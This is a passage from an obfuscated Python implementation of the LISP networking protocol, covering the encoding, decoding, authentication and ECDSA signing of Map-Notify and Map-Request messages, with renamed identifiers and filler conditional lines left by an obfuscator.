packet = packet [ self . auth_len : : ]
if 26 - 26: i11iIiiIii . OOooOOo - O0
return ( [ OO0o0 , packet ] )
if 73 - 73: I1IiiI
if 95 - 95: OoO0O00 % OoO0O00 * oO0o - OoO0O00
def encode_xtr_id ( self , packet ) :
OoOO = self . xtr_id >> 64
IiI1i111III = self . xtr_id & 0xffffffffffffffff
OoOO = byte_swap_64 ( OoOO )
IiI1i111III = byte_swap_64 ( IiI1i111III )
I1111iii1ii11 = byte_swap_64 ( self . site_id )
packet += struct . pack ( "QQQ" , OoOO , IiI1i111III , I1111iii1ii11 )
return ( packet )
if 79 - 79: iIii1I11I1II1 / iIii1I11I1II1 . iII111i . Ii1I
if 49 - 49: I1ii11iIi11i * I1Ii111 + OoOoOO00
def decode_xtr_id ( self , packet ) :
ooOoooOoo0oO = struct . calcsize ( "QQQ" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
packet = packet [ len ( packet ) - ooOoooOoo0oO : : ]
OoOO , IiI1i111III , I1111iii1ii11 = struct . unpack ( "QQQ" ,
packet [ : ooOoooOoo0oO ] )
OoOO = byte_swap_64 ( OoOO )
IiI1i111III = byte_swap_64 ( IiI1i111III )
self . xtr_id = ( OoOO << 64 ) | IiI1i111III
self . site_id = byte_swap_64 ( I1111iii1ii11 )
return ( True )
if 72 - 72: OoO0O00
if 57 - 57: OOooOOo / OoO0O00 + I1ii11iIi11i
if 60 - 60: O0 * Oo0Ooo % OOooOOo + IiII . OoO0O00 . Oo0Ooo
if 70 - 70: I11i . I1ii11iIi11i * oO0o
if 97 - 97: oO0o . iIii1I11I1II1 - OOooOOo
if 23 - 23: I1ii11iIi11i % I11i
if 18 - 18: OoooooooOO . i1IIi + II111iiii
if 99 - 99: I1Ii111 - I1ii11iIi11i - I1IiiI - I1Ii111 + OoO0O00 + II111iiii
if 34 - 34: I1Ii111 * I11i
if 31 - 31: IiII . oO0o
if 40 - 40: Ii1I - I11i / II111iiii * i1IIi + IiII * II111iiii
if 53 - 53: I1ii11iIi11i - i11iIiiIii . OoO0O00 / OoOoOO00 - I1Ii111
if 99 - 99: Ii1I - IiII - i1IIi / i11iIiiIii . IiII
if 58 - 58: OOooOOo
if 12 - 12: I1IiiI . o0oOOo0O0Ooo * OoooooooOO
if 64 - 64: OoOoOO00 + IiII - i1IIi . II111iiii . OoO0O00
if 31 - 31: oO0o . iII111i - I11i . iIii1I11I1II1 + I11i . OoOoOO00
if 86 - 86: I1ii11iIi11i - I1ii11iIi11i / iII111i - I1ii11iIi11i * iII111i + I1Ii111
if 61 - 61: Oo0Ooo / II111iiii / Oo0Ooo / i1IIi . Oo0Ooo - IiII
if 30 - 30: OoooooooOO % OOooOOo
if 14 - 14: OoOoOO00 / OoO0O00 / i11iIiiIii - OoOoOO00 / o0oOOo0O0Ooo - OOooOOo
if 81 - 81: iII111i % Ii1I . ooOoO0o
if 66 - 66: I1ii11iIi11i * Ii1I / OoooooooOO * O0 % OOooOOo
if 49 - 49: II111iiii . I1IiiI * O0 * Ii1I / I1Ii111 * OoooooooOO
if 82 - 82: Oo0Ooo / Ii1I / Ii1I % Ii1I
if 20 - 20: ooOoO0o
if 63 - 63: iIii1I11I1II1 . OoO0O00
if 100 - 100: i1IIi * i1IIi
if 26 - 26: OOooOOo . OoO0O00 % OoOoOO00
if 94 - 94: IiII
if 15 - 15: Ii1I - IiII / O0
if 28 - 28: I1Ii111 . i1IIi / I1ii11iIi11i
if 77 - 77: i11iIiiIii / I1Ii111 / i11iIiiIii % OoOoOO00 - I1Ii111
class lisp_map_notify ( ) :
def __init__ ( self , lisp_sockets ) :
self . etr = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . etr_port = 0
self . retransmit_timer = None
self . lisp_sockets = lisp_sockets
self . retry_count = 0
self . record_count = 0
self . alg_id = LISP_NONE_ALG_ID
self . key_id = 0
self . auth_len = 0
self . auth_data = ""
self . nonce = 0
self . nonce_key = ""
self . packet = None
self . site = ""
self . map_notify_ack = False
self . eid_records = ""
self . eid_list = [ ]
if 80 - 80: I1Ii111 % OoOoOO00 . OoooooooOO . II111iiii % IiII
if 6 - 6: I1Ii111 % IiII / Ii1I + I1Ii111 . oO0o
def print_notify ( self ) :
iIi11i = binascii . hexlify ( self . auth_data )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID and len ( iIi11i ) != 40 ) :
iIi11i = self . auth_data
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID and len ( iIi11i ) != 64 ) :
iIi11i = self . auth_data
if 70 - 70: iIii1I11I1II1 / Ii1I
oOOo0ooO0 = ( "{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}" )
lprint ( oOOo0ooO0 . format ( bold ( "Map-Notify-Ack" , False ) if self . map_notify_ack else bold ( "Map-Notify" , False ) ,
# I1Ii111 * Oo0Ooo . o0oOOo0O0Ooo - I1Ii111
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , iIi11i ) )
if 16 - 16: I1IiiI - O0 * I1ii11iIi11i . I1ii11iIi11i % OOooOOo
if 39 - 39: II111iiii / I11i - OoOoOO00 * OoOoOO00 - Ii1I
if 8 - 8: O0 . i11iIiiIii
if 54 - 54: OOooOOo . I1ii11iIi11i * I11i % I1Ii111 . O0 * IiII
def zero_auth ( self , packet ) :
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
iIi11i = struct . pack ( "QQI" , 0 , 0 , 0 )
if 87 - 87: Ii1I % I1ii11iIi11i * Oo0Ooo
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
iIi11i = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
if 59 - 59: Oo0Ooo / I11i - iIii1I11I1II1 * iIii1I11I1II1
packet += iIi11i
return ( packet )
if 18 - 18: I11i * I1ii11iIi11i / i11iIiiIii / iIii1I11I1II1 * OoooooooOO . OOooOOo
if 69 - 69: Oo0Ooo * ooOoO0o
def encode ( self , eid_records , password ) :
if ( self . map_notify_ack ) :
ooo0OOoo = ( LISP_MAP_NOTIFY_ACK << 28 ) | self . record_count
else :
ooo0OOoo = ( LISP_MAP_NOTIFY << 28 ) | self . record_count
if 91 - 91: o0oOOo0O0Ooo . ooOoO0o / OoO0O00 / i11iIiiIii * o0oOOo0O0Ooo
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 52 - 52: I1IiiI - i11iIiiIii / IiII . oO0o
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . packet = IIii1i + eid_records
return ( self . packet )
if 38 - 38: oO0o + OoooooooOO * OoOoOO00 % oO0o
if 91 - 91: i1IIi - I1ii11iIi11i * I1IiiI
if 24 - 24: OoOoOO00 * Ii1I
if 17 - 17: OoO0O00 . I1IiiI * O0
if 81 - 81: OOooOOo
IIii1i = self . zero_auth ( IIii1i )
IIii1i += eid_records
if 58 - 58: II111iiii . I1Ii111 . Ii1I * OoooooooOO / Ii1I / I11i
I1I = lisp_hash_me ( IIii1i , self . alg_id , password , False )
if 41 - 41: I11i + OoO0O00 . iII111i
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
IIII1II11Iii = self . auth_len
self . auth_data = I1I
IIii1i = IIii1i [ 0 : OoO00oo00 ] + I1I + IIii1i [ OoO00oo00 + IIII1II11Iii : : ]
self . packet = IIii1i
return ( IIii1i )
if 73 - 73: i11iIiiIii * I1IiiI + o0oOOo0O0Ooo / oO0o
if 56 - 56: i1IIi
def decode ( self , packet ) :
OO0o0 = packet
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 11 - 11: i11iIiiIii % o0oOOo0O0Ooo / I11i * OoooooooOO
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
ooo0OOoo = socket . ntohl ( ooo0OOoo [ 0 ] )
self . map_notify_ack = ( ( ooo0OOoo >> 28 ) == LISP_MAP_NOTIFY_ACK )
self . record_count = ooo0OOoo & 0xff
packet = packet [ ooOoooOoo0oO : : ]
if 82 - 82: IiII
O00oO00oOO00O = "QBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 10 - 10: Oo0Ooo % OOooOOo / I11i * IiII - o0oOOo0O0Ooo
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 54 - 54: i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i / I1IiiI . iIii1I11I1II1 / iII111i
self . nonce_key = lisp_hex_string ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
packet = packet [ ooOoooOoo0oO : : ]
self . eid_records = packet [ self . auth_len : : ]
if 1 - 1: I1Ii111 / OoOoOO00 * OoOoOO00 - o0oOOo0O0Ooo % Ii1I
if ( self . auth_len == 0 ) : return ( self . eid_records )
if 96 - 96: IiII / Ii1I % OoO0O00 . iIii1I11I1II1
if 30 - 30: I11i - OoO0O00
if 15 - 15: OoooooooOO
if 31 - 31: II111iiii
if ( len ( packet ) < self . auth_len ) : return ( None )
if 62 - 62: iIii1I11I1II1 % I1Ii111 % I1ii11iIi11i * IiII
IIII1II11Iii = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
OoO0o00O0oOOo , ooO , I1IiiIiIIi1Ii = struct . unpack ( "QQI" , packet [ : IIII1II11Iii ] )
oo00oo = ""
if 87 - 87: IiII
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
OoO0o00O0oOOo , ooO , I1IiiIiIIi1Ii , oo00oo = struct . unpack ( "QQQQ" ,
packet [ : IIII1II11Iii ] )
if 45 - 45: oO0o + II111iiii * O0 % OOooOOo . iIii1I11I1II1
self . auth_data = lisp_concat_auth_data ( self . alg_id , OoO0o00O0oOOo , ooO ,
I1IiiIiIIi1Ii , oo00oo )
if 55 - 55: IiII
ooOoooOoo0oO = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
packet = self . zero_auth ( OO0o0 [ : ooOoooOoo0oO ] )
ooOoooOoo0oO += IIII1II11Iii
packet += OO0o0 [ ooOoooOoo0oO : : ]
return ( packet )
if 43 - 43: OOooOOo
if 17 - 17: i11iIiiIii
if 94 - 94: OoooooooOO - IiII + oO0o . OoooooooOO / i1IIi
if 53 - 53: I1Ii111 % I1ii11iIi11i
if 17 - 17: OoooooooOO % Ii1I % O0
if 46 - 46: iII111i + I1Ii111 % OoooooooOO * I1ii11iIi11i
if 89 - 89: IiII - IiII % iII111i / I11i + oO0o - IiII
if 97 - 97: Ii1I % OoOoOO00 / I1ii11iIi11i / iIii1I11I1II1 * OoooooooOO * OOooOOo
if 80 - 80: oO0o / O0
if 55 - 55: I1IiiI * I11i / O0 % OoOoOO00
if 71 - 71: i11iIiiIii * OoOoOO00 * OOooOOo + oO0o + Oo0Ooo
if 59 - 59: IiII
if 54 - 54: OOooOOo
if 27 - 27: OoOoOO00 - OoO0O00 + o0oOOo0O0Ooo + ooOoO0o . OoO0O00
if 86 - 86: II111iiii - OoooooooOO - ooOoO0o % iII111i
if 16 - 16: ooOoO0o + Oo0Ooo + OoooooooOO
if 87 - 87: I1IiiI . oO0o / IiII - OoooooooOO
if 33 - 33: oO0o % OoO0O00 . iIii1I11I1II1 / IiII
if 3 - 3: Ii1I + OoO0O00
if 60 - 60: OoO0O00 . OoOoOO00 - I1ii11iIi11i - I1IiiI - II111iiii % Oo0Ooo
if 62 - 62: O0 + iII111i - iII111i % iIii1I11I1II1
if 47 - 47: I1Ii111 + I1IiiI
if 40 - 40: iIii1I11I1II1 % Ii1I + II111iiii - I1IiiI
if 80 - 80: oO0o
if 81 - 81: OoooooooOO / ooOoO0o * iIii1I11I1II1 . Oo0Ooo + oO0o / O0
if 84 - 84: II111iiii - o0oOOo0O0Ooo
if 78 - 78: IiII
if 58 - 58: i11iIiiIii - OoOoOO00
if 67 - 67: I1ii11iIi11i / iII111i + iIii1I11I1II1 % I1IiiI
if 99 - 99: ooOoO0o . Ii1I
if 92 - 92: i1IIi
if 68 - 68: OoO0O00 % IiII - oO0o - ooOoO0o . Oo0Ooo
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
if 4 - 4: Ii1I
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
if 32 - 32: I1Ii111 / oO0o / I1IiiI
if 22 - 22: OoO0O00 - OoOoOO00 . Oo0Ooo + o0oOOo0O0Ooo
if 69 - 69: oO0o - I1IiiI
if 10 - 10: i1IIi / iII111i . II111iiii * i1IIi % OoooooooOO
if 83 - 83: I11i . OOooOOo + I1Ii111 * I11i . I1Ii111 + oO0o
if 64 - 64: Ii1I . o0oOOo0O0Ooo - i1IIi
if 35 - 35: I1ii11iIi11i % OoooooooOO
if 59 - 59: I1IiiI % I11i
if 32 - 32: I1IiiI * O0 + O0
if 34 - 34: IiII
if 5 - 5: OoO0O00 . I1IiiI
if 48 - 48: Oo0Ooo - OoO0O00 . I11i - iIii1I11I1II1 % Ii1I
if 47 - 47: iII111i / OoooooooOO - II111iiii
class lisp_map_request ( ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
if 91 - 91: OoOoOO00 + o0oOOo0O0Ooo
if 23 - 23: i1IIi
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 9 - 9: i1IIi % I1Ii111 - OoO0O00 * OoOoOO00 . o0oOOo0O0Ooo
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 18 - 18: Ii1I . OoOoOO00 + iII111i . I1IiiI + OoooooooOO . OoO0O00
if 31 - 31: I1Ii111 - I11i
def print_map_request ( self ) :
oooOOOO0oOo = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
oooOOOO0oOo = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 49 - 49: iIii1I11I1II1 - iIii1I11I1II1 - OoOoOO00 + IiII / OoOoOO00
if 74 - 74: OoooooooOO + I1ii11iIi11i % O0
if 32 - 32: I1ii11iIi11i + I1ii11iIi11i
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
lprint ( oOOo0ooO0 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# o0oOOo0O0Ooo
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , oooOOOO0oOo ) )
if 56 - 56: o0oOOo0O0Ooo - I1Ii111 / I11i
oOoo0oO = self . keys
for III1iii1 in self . itr_rlocs :
lprint ( " itr-rloc: afi {} {}{}" . format ( III1iii1 . afi ,
red ( III1iii1 . print_address_no_iid ( ) , False ) ,
"" if ( oOoo0oO == None ) else ", " + oOoo0oO [ 1 ] . print_keys ( ) ) )
oOoo0oO = None
if 78 - 78: I1Ii111 % OOooOOo
if 73 - 73: I1ii11iIi11i + iII111i * I1IiiI * I11i
if 35 - 35: I11i * O0 * OoO0O00 . I1ii11iIi11i
def sign_map_request ( self , privkey ) :
O000oOO0Oooo = self . signature_eid . print_address ( )
o0000oO0OOOo0 = self . source_eid . print_address ( )
o00ooo0O = self . target_eid . print_address ( )
oO0o0O00O00O = lisp_hex_string ( self . nonce ) + o0000oO0OOOo0 + o00ooo0O
self . map_request_signature = privkey . sign ( oO0o0O00O00O )
o00 = binascii . b2a_base64 ( self . map_request_signature )
o00 = { "source-eid" : o0000oO0OOOo0 , "signature-eid" : O000oOO0Oooo ,
"signature" : o00 }
return ( json . dumps ( o00 ) )
if 59 - 59: O0 % iII111i
if 32 - 32: Ii1I % I11i + OOooOOo % OoooooooOO
def verify_map_request_sig ( self , pubkey ) :
oooOo0O00o = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( oooOo0O00o ) )
return ( False )
if 65 - 65: I11i . i11iIiiIii
if 6 - 6: Ii1I % I11i * I1IiiI . IiII
o0000oO0OOOo0 = self . source_eid . print_address ( )
o00ooo0O = self . target_eid . print_address ( )
oO0o0O00O00O = lisp_hex_string ( self . nonce ) + o0000oO0OOOo0 + o00ooo0O
pubkey = binascii . a2b_base64 ( pubkey )
if 30 - 30: O0 / OOooOOo + OoOoOO00 % OoO0O00 + I1Ii111
IIIiiI1I = True
try :
ii1i1I1111ii = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 55 - 55: iII111i * Oo0Ooo + OoOoOO00 * OOooOOo / iII111i * i1IIi
IIIiiI1I = False
if 49 - 49: IiII + iIii1I11I1II1
if 30 - 30: i11iIiiIii % o0oOOo0O0Ooo . i1IIi
if ( IIIiiI1I ) :
try :
IIIiiI1I = ii1i1I1111ii . verify ( self . map_request_signature , oO0o0O00O00O )
except :
IIIiiI1I = False
if 49 - 49: o0oOOo0O0Ooo * Ii1I + Oo0Ooo
if 1 - 1: o0oOOo0O0Ooo / II111iiii + I11i . i11iIiiIii + ooOoO0o . OoOoOO00
if 95 - 95: o0oOOo0O0Ooo / I1Ii111 % II111iiii + ooOoO0o
oOo0ooOO0O = bold ( "passed" if IIIiiI1I else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( oOo0ooOO0O , oooOo0O00o ) )
return ( IIIiiI1I )
if 11 - 11: OoOoOO00 % I1ii11iIi11i - Ii1I - I1Ii111
if 58 - 58: OoOoOO00 . Ii1I / IiII * oO0o
def encode ( self , probe_dest , probe_port ) :
ooo0OOoo = ( LISP_MAP_REQUEST << 28 ) | self . record_count
ooo0OOoo = ooo0OOoo | ( self . itr_rloc_count << 8 )
if ( self . auth_bit ) : ooo0OOoo |= 0x08000000
if ( self . map_data_present ) : ooo0OOoo |= 0x04000000
if ( self . rloc_probe ) : ooo0OOoo |= 0x02000000
if ( self . smr_bit ) : ooo0OOoo |= 0x01000000
if ( self . pitr_bit ) : ooo0OOoo |= 0x00800000
if ( self . smr_invoked_bit ) : ooo0OOoo |= 0x00400000
if ( self . mobile_node ) : ooo0OOoo |= 0x00200000
if ( self . xtr_id_present ) : ooo0OOoo |= 0x00100000
if ( self . local_xtr ) : ooo0OOoo |= 0x00004000
if ( self . dont_reply_bit ) : ooo0OOoo |= 0x00002000
if 70 - 70: OoooooooOO
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "Q" , self . nonce )
if 51 - 51: oO0o / II111iiii + ooOoO0o / I11i . iII111i
if 77 - 77: iIii1I11I1II1 * OoOoOO00 + i11iIiiIii * ooOoO0o
if 81 - 81: Ii1I * iII111i % Ii1I % i11iIiiIii % i1IIi / o0oOOo0O0Ooo
if 53 - 53: OoOoOO00
if 55 - 55: ooOoO0o % i1IIi / OoO0O00
if 77 - 77: O0 % oO0o % oO0o
I111 = False
iii = self . privkey_filename
if ( iii != None and os . path . exists ( iii ) ) :
ii11I1IIi = open ( iii , "r" ) ; ii1i1I1111ii = ii11I1IIi . read ( ) ; ii11I1IIi . close ( )
try :
ii1i1I1111ii = ecdsa . SigningKey . from_pem ( ii1i1I1111ii )
except :
return ( None )
if 76 - 76: O0
OoOoO00OoOOo = self . sign_map_request ( ii1i1I1111ii )
I111 = True
elif ( self . map_request_signature != None ) :
o00 = binascii . b2a_base64 ( self . map_request_signature )
OoOoO00OoOOo = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : o00 }
OoOoO00OoOOo = json . dumps ( OoOoO00OoOOo )
I111 = True
if 64 - 64: Ii1I
if ( I111 ) :
O000oo0O0OO0 = LISP_LCAF_JSON_TYPE
o0O000Ooo = socket . htons ( LISP_AFI_LCAF )
iiii1 = socket . htons ( len ( OoOoO00OoOOo ) + 2 )
oo0ooOO = socket . htons ( len ( OoOoO00OoOOo ) )
IIii1i += struct . pack ( "HBBBBHH" , o0O000Ooo , 0 , 0 , O000oo0O0OO0 , 0 ,
iiii1 , oo0ooOO )
IIii1i += OoOoO00OoOOo
IIii1i += struct . pack ( "H" , 0 )
else :
if ( self . source_eid . instance_id != 0 ) :
IIii1i += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IIii1i += self . source_eid . lcaf_encode_iid ( )
else :
IIii1i += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
IIii1i += self . source_eid . pack_address ( )
if 69 - 69: iIii1I11I1II1 + Oo0Ooo
if 70 - 70: OoooooooOO * i11iIiiIii
if 60 - 60: IiII / iIii1I11I1II1 + OoooooooOO - I1ii11iIi11i * i11iIiiIii
if 47 - 47: O0 . I1IiiI / ooOoO0o % i11iIiiIii
if 47 - 47: Ii1I . OoOoOO00 . iIii1I11I1II1 . o0oOOo0O0Ooo
if 39 - 39: o0oOOo0O0Ooo
if 89 - 89: OoooooooOO + iII111i . I1Ii111 / Ii1I
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
oo0o00OO = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 75 - 75: iIii1I11I1II1 * iII111i / OoOoOO00 * II111iiii . i1IIi
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if 6 - 6: Ii1I % Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
if 59 - 59: I11i . I11i * I1IiiI - Ii1I % OoOoOO00
if 19 - 19: OoooooooOO / Oo0Ooo - I1Ii111 . OoOoOO00
if 8 - 8: I11i % ooOoO0o . iIii1I11I1II1
if 95 - 95: o0oOOo0O0Ooo + i11iIiiIii . I1ii11iIi11i . ooOoO0o . o0oOOo0O0Ooo
if 93 - 93: iII111i
if 55 - 55: II111iiii % o0oOOo0O0Ooo - OoO0O00
for III1iii1 in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( III1iii1 ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
oOoo0oO = lisp_keys ( 1 )
self . keys = [ None , oOoo0oO , None , None ]
if 48 - 48: ooOoO0o * iIii1I11I1II1 % OoOoOO00
oOoo0oO = self . keys [ 1 ]
oOoo0oO . add_key_by_nonce ( self . nonce )
IIii1i += oOoo0oO . encode_lcaf ( III1iii1 )
else :
IIii1i += struct . pack ( "H" , socket . htons ( III1iii1 . afi ) )
IIii1i += III1iii1 . pack_address ( )
if 100 - 100: II111iiii - i11iIiiIii + OoO0O00 % ooOoO0o - iIii1I11I1II1 * i11iIiiIii
if 30 - 30: OoO0O00 . OoO0O00 . Ii1I % Ii1I * i1IIi * oO0o
if 74 - 74: OoooooooOO
iIi1iii1 = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 42 - 42: I11i / i11iIiiIii
if 7 - 7: I11i
Ii1 = 0
if ( self . subscribe_bit ) :
Ii1 = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 1 - 1: O0 / i11iIiiIii
if 52 - 52: I11i / OoO0O00
if 24 - 24: i11iIiiIii
O00oO00oOO00O = "BB"
IIii1i += struct . pack ( O00oO00oOO00O , Ii1 , iIi1iii1 )
if 52 - 52: ooOoO0o % iIii1I11I1II1 . i11iIiiIii % ooOoO0o
if ( self . target_group . is_null ( ) == False ) :
IIii1i += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IIii1i += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
IIii1i += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IIii1i += self . target_eid . lcaf_encode_iid ( )
else :
IIii1i += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
IIii1i += self . target_eid . pack_address ( )
if 86 - 86: oO0o % iIii1I11I1II1 % OoOoOO00
if 94 - 94: o0oOOo0O0Ooo - I11i % oO0o % o0oOOo0O0Ooo + I11i
if 31 - 31: I1Ii111 * o0oOOo0O0Ooo * II111iiii + O0 / iII111i * ooOoO0o
if 52 - 52: iIii1I11I1II1 / iII111i . O0 * IiII . I1IiiI
if 67 - 67: II111iiii + Ii1I - I1IiiI * ooOoO0o
if ( self . subscribe_bit ) : IIii1i = self . encode_xtr_id ( IIii1i )
return ( IIii1i )
if 19 - 19: i11iIiiIii * Oo0Ooo
if 33 - 33: i11iIiiIii + I1IiiI
def lcaf_decode_json ( self , packet ) :
O00oO00oOO00O = "BBBBHH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 95 - 95: I1ii11iIi11i / IiII % iIii1I11I1II1 + O0
i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 , oo0ooOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 2 - 2: iIii1I11I1II1 * OoOoOO00 . O0 / OoO0O00
if 3 - 3: I1ii11iIi11i
if ( O000oo0O0OO0 != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 53 - 53: I11i . OoooooooOO % ooOoO0o
if 13 - 13: OoO0O00 * iIii1I11I1II1 + II111iiii - Oo0Ooo - OoOoOO00
if 43 - 43: iII111i / I1Ii111 * I1IiiI % ooOoO0o % I1IiiI
if 18 - 18: OoO0O00
iiii1 = socket . ntohs ( iiii1 )
oo0ooOO = socket . ntohs ( oo0ooOO )
packet = packet [ ooOoooOoo0oO : : ]
if ( len ( packet ) < iiii1 ) : return ( None )
if ( iiii1 != oo0ooOO + 2 ) : return ( None )
if 99 - 99: iII111i / oO0o . i11iIiiIii / I11i + i1IIi - I11i
if 50 - 50: i1IIi
if 56 - 56: OoO0O00 + I1Ii111 / Ii1I
if 75 - 75: OoOoOO00
try :
OoOoO00OoOOo = json . loads ( packet [ 0 : oo0ooOO ] )
except :
return ( None )
if 96 - 96: o0oOOo0O0Ooo * I11i * Oo0Ooo
packet = packet [ oo0ooOO : : ]
if 36 - 36: OoooooooOO + ooOoO0o . oO0o * ooOoO0o + IiII
if 45 - 45: oO0o / iII111i + I1ii11iIi11i - Oo0Ooo - ooOoO0o . iIii1I11I1II1
if 52 - 52: I1IiiI + i1IIi . iII111i * I1IiiI
if 31 - 31: Oo0Ooo % iIii1I11I1II1 . O0
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if ( O000oOOoOOO != 0 ) : return ( packet )
if 80 - 80: I11i / Oo0Ooo + I1ii11iIi11i
if 18 - 18: II111iiii - iII111i / iIii1I11I1II1 % OoOoOO00 % I1ii11iIi11i / o0oOOo0O0Ooo
if 47 - 47: OOooOOo
if 24 - 24: Ii1I % o0oOOo0O0Ooo
if ( OoOoO00OoOOo . has_key ( "source-eid" ) == False ) : return ( packet )
OOo0O0O0o0 = OoOoO00OoOOo [ "source-eid" ]
O000oOOoOOO = LISP_AFI_IPV4 if OOo0O0O0o0 . count ( "." ) == 3 else LISP_AFI_IPV6 if OOo0O0O0o0 . count ( ":" ) == 7 else None
if 82 - 82: OoooooooOO / I1IiiI * II111iiii - OoooooooOO % iIii1I11I1II1 * OoO0O00
if ( O000oOOoOOO == None ) :
